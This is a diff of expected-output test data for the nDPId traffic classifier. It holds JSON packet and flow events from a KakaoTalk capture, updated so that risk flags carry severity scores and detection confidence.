ElIUwOqnMT+7rwPfeomV3b9fbsOdbRa7VkQEi4icvvEwgda+Sg6Qy"}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1430069164657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"ts_msec":1430069164657,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTg0AAQAZ+ZQoYUryLlgB9t2MBu1EoBIpiI9Y5UBCiGOkBAAA="}
@@ -33,25 +33,25 @@
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1430069164966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069164966,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxKlUAAQAaV1AoYUrxuTI8y5ekjKS1pjaoAAAAAoAI2sFqBAAACBAV4BAIICgACxz8AAAAAAQMDBQ=="}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1430069165114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069165114,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8Iynl6dfwna4taY2roBI4kADPAAACBAV4BAIICkTbbpQAAsc\/AQMDCQ=="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1430069165115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1430069165115,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADRKlkAAQAaV2woYUrxuTI8y5ekjKS1pjavX8J2vgBABtlp5AAABAQgKAALHTkTbbpQ="}
-00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069164966,"flow_last_seen":1430069165129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1430069165129,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01162{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":58,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069164966,"flow_last_seen":1430069165314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1430069165314,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","6":"Self-signed Certificate","7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}}
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069164966,"flow_last_seen":1430069165129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1430069165129,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01512{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":58,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069164966,"flow_last_seen":1430069165314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"ts_msec":1430069165314,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"ts_msec":1430069170090,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1430069170090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":164,"pkt_l4_len":128,"ts_msec":1430069170090,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAJSUaEAAQAZSqQoYUrytwki8h34UbGWkOWcyCtXvgBgB1zgmAAABAQgKAALJQHWhBxYXAwEAW9BJTUK7bhQDJS6M4k2xveYn3KZ2THpi3b2p1WnyM44nZ0651+YzJehbLb+jV4nNEd4GZbKLQU+P8abQYninXFhPSKcNuFppnDwsImxNyj3HrOvurwOWRZpYp3o="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170892,"flow_last_seen":1430069170892,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1430069170892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1430069170892,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":122,"pkt_l4_len":86,"ts_msec":1430069170892,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGoAAEAAPxHbOAoYUrwByQGuLDlaBQBWgNSByQAHC4ZVGZBlh61hMGy+mVz7szeLE04wAIGpUs16HTnaFQo\/DwShnbgrVUo6QPfO7hnIEQI6Zble8vC3moejgAAAAXwPCk3m1v5lftk="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170892,"flow_last_seen":1430069170892,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1430069170892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","ndpi": {"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170892,"flow_last_seen":1430069170892,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1430069170892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170975,"flow_last_seen":1430069170975,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1430069170975,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1430069170975,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":122,"pkt_l4_len":86,"ts_msec":1430069170975,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGoAAEAAQBHaOAoYUrwByQGuKB1aBwBWSf6ByQAHVJql2hcYBvUW09\/cV2PnqW9IAC+tkcS3zbxHaXzNy97m1tMPsxdrmxKMjQTBocmvV+MtI4fyJpYC3zCcgAAAAaPWslm6g8tl\/I8="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170975,"flow_last_seen":1430069170975,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1430069170975,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","ndpi": {"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170975,"flow_last_seen":1430069170975,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1430069170975,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10269,"dst_port":23047,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171118,"flow_last_seen":1430069171118,"flow_idle_time":180000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1430069171118,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1430069171118,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":100,"pkt_l4_len":64,"ts_msec":1430069171118,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFQAAEAAPxHbTgoYUrwByQGuLDhaBABATCmA7E6yizmc2guGVRn+xfaQv+g9g3ccEnajV1GbM8MpJWVK2C77CAiJwDoJYkgGCqWuS2HWMkwGeQ=="}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171118,"flow_last_seen":1430069171118,"flow_idle_time":180000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1430069171118,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171118,"flow_last_seen":1430069171118,"flow_idle_time":180000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1430069171118,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1430069171120,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":99,"pkt_l4_len":63,"ts_msec":1430069171120,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFMAAEAAPxHbTwoYUrwByQGuLDhaBAA\/C92AbE6zizmgmguGVRkt\/rZnfXpGz0N2A\/IfJpewUyMSY166JO1xGXdEkGNQd31ADIw6ZS3SDh9Y"}
 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1430069171120,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":99,"pkt_l4_len":63,"ts_msec":1430069171120,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFMAAEAAPxHbTwoYUrwByQGuLDhaBAA\/5SmAbE60izmkWguGVRmezvGSQL2r8\/lU9MEKvF6SC08uWokrFHcn2V7\/8UTxLNEjkf5mPRch1tsI"}
 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1430069171127,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":122,"pkt_l4_len":86,"ts_msec":1430069171127,"pkt":"AAACEgAAAAAAAAAAAAAIAEUoAGoAAEAAGxH\/EAHJAa4KGFK8WgUsOQBWReSByQAHVJql2hcYBvUW09\/cV2PnqW9IAC+tkcS3zbxHaXzNy97m1tMPsxdrmxKMjQTBocmvV+MtI4fyJpYC3zCcgAAAAaPWslm6g8tl\/I8="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171389,"flow_last_seen":1430069171389,"flow_idle_time":180000,"flow_min_l4_payload_len":79,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":79,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1430069171389,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1430069171389,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":123,"pkt_l4_len":87,"ts_msec":1430069171389,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGsAAEAAQBHaNwoYUrwByQGuKBxaBgBXWCuA7DE+fqkVA1Sapdp6cTmDebnhh8KUkQVLcfVIHO+KdE\/hh8TrsDi1pxsxiqViFSLVRYeZKeMWrEXQddUHKF8UZHmGznF9XlwFasBuVesU"}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171389,"flow_last_seen":1430069171389,"flow_idle_time":180000,"flow_min_l4_payload_len":79,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":79,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1430069171389,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069171389,"flow_last_seen":1430069171389,"flow_idle_time":180000,"flow_min_l4_payload_len":79,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":79,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1430069171389,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":10268,"dst_port":23046,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
 00638{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1430069171425,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":192,"pkt_l4_len":156,"ts_msec":1430069171425,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAALAAAEAAQBHZ8goYUrwByQGuKBxaBgCccR6AbDE\/fqkYw1SapdpQtIGDUUcsKy8FZc8SkcXbnkaLnkk7o+K31\/Lp8iVo3SBPJc3DyoRUtaFntc3koP5JLgEppFZXqNkw36nmYntuZ329GNTJ06T0XeyZJfDm34fzEotPLv3zEaM1kQ76cuJR6IF9rGbKT3sQKWcYIsd5M3XbqcXgkS4bFd8efSkCV9pxMGaMM2HU"}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1430069171464,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":115,"pkt_l4_len":79,"ts_msec":1430069171464,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGMAAEAAQBHaPwoYUrwByQGuKBxaBgBPG\/OAbDFAfqkcg1SapdrEmBFpbnVmJMblF0rZoL8vvV92uiSDpJJT7NfUzojI6pP2kn9ZuUksJi0oXTyacMa3Otx9PZKNJxznlw=="}
 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1430069171998,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"ts_msec":1430069171998,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAH4AAEAAPxHbJAoYUrwByQGuLDlaBQBqX6qByAAMC4ZVGUMDyNdZMqzZvFL5masXDZVA6JQCTSwYzII6r0J+H6ebHDpiG6\/AGpupgF2zzgl2ppSiLVPnYiD98U8UjOQ2fRfyw\/ugiovyQFT+lfaAAAACkQQ8eHVaWMSL\/A=="}
@@ -74,43 +74,43 @@
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2851,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1430069211639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069211639,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxoAkAAQAZvaQoYUryt\/FiA6jIBuzJ1sXgAAAAAoAI2sGN\/AAACBAV4BAIICgAC2XoAAAAAAQMDBQ=="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211640,"flow_last_seen":1430069211640,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1430069211640,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1430069211640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":79,"pkt_l4_len":43,"ts_msec":1430069211640,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD\/Ze0AAQBH4oQoYUrwKvAEBYocANQAr1lVimAEAAAEAAAAAAAAEbXF0dAhmYWNlYm9vawNjb20AAAEAAQ=="}
-00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211640,"flow_last_seen":1430069211640,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1430069211640,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2852,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211640,"flow_last_seen":1430069211640,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1430069211640,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"mqtt.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2856,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1430069211703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1430069211703,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy0dUAA+AZrBa38WIAKGFK8AbvqMmPPnoQydbF5YBIRHFG1AAACBAV4"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2857,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1430069211703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"ts_msec":1430069211703,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChoA0AAQAZvfAoYUryt\/FiA6jIBuzJ1sXljz56FUBA2sGNrAAA="}
